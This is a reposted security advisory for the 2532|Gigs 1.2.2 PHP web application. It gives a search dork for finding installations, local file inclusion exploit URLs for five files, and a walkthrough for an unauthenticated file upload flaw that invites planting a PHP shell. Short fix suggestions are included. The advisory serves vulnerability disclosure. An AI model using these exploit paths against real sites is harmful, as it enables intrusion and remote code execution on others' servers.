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2532|Gigs 1.2.2 Stable Multiple Remote Vulnerabilities

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2532|Gigs 1.2.2 Stable Multiple Remote Vulnerabilities 


[0x01] Informations:

Script         : 2532|Gigs v1.2 Stable
Download       : http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1
Dork           : Powered by 2532|Gigs v1.2.2
Vulnerability  : Local File Inclusion / Remote File Upload
Author         : Osirys
Website        : http://osirys.org
Notes          : Proud to be Italian
Greets:        : XaDoS, x0r, emgent, Jay, Todd and AlpHaNiX

[0x02] Bug: [Multiple Local File Inclusions]

Bugged file is: /[path]/settings.php
Bugged file is: /[path]/deleteuser.php
Bugged file is: /[path]/mini_calendar.php
Bugged file is: /[path]/manage_venues.php
Bugged file is: /[path]/manage_gigs.php

* There are a lot of other files vulnerable to LFI !


2532|Gigs v1.1

  // Load the settings.php language file


settings.php page starts in this way. Includes a non declarate variable -> $language

[!] FIX: Declare $language var.

[!] EXPLOIT: /[path]/settings.php?language=[local_file_to_include]
[!] EXPLOIT: /[path]/deleteuser.php?language=[local_file_to_include]
[!] EXPLOIT: /[path]/mini_calendar?language=[local_file_to_include]
[!] EXPLOIT: /[path]/manage_venues.php?language=[local_file_to_include]
[!] EXPLOIT: /[path]/manage_gigs.php?language=[local_file_to_include]

[0x03] Bug: [Remote File Upload]

Bugged file is: /[path]/upload_flyer.php


if (isset($_POST['submitflyer']))
   if (strlen($_FILES['banner']['name']) > 0)
$target = "flyers/".$_FILES['banner']['name'];
move_uploaded_file($_FILES['banner']['tmp_name'], $target);

// Other code, like it cheeks if /[path]/flyers dir is writable or not !


As we can see, everyone can upload everything that he wants. There is not login required,
and there isn't a cheek for the extension of the file that is going to be uploaded.
So, an unregistered user can upload a file of any extension, like a .php file. Why not
a php shell ?

[!] FIX: Before the upload script, just cheek if the user is registered, and then allow him
         only to upload .gif/jpg or the extension you want, not .php or other extensions !

             1) Go to: /path/upload_flyer.php
             2) Select your local file to upload
             3) Press submit button
             4) Cheek your file at: /[path]/flyers/your_local_file.your_extension



#  0day.today [2024-09-19]  #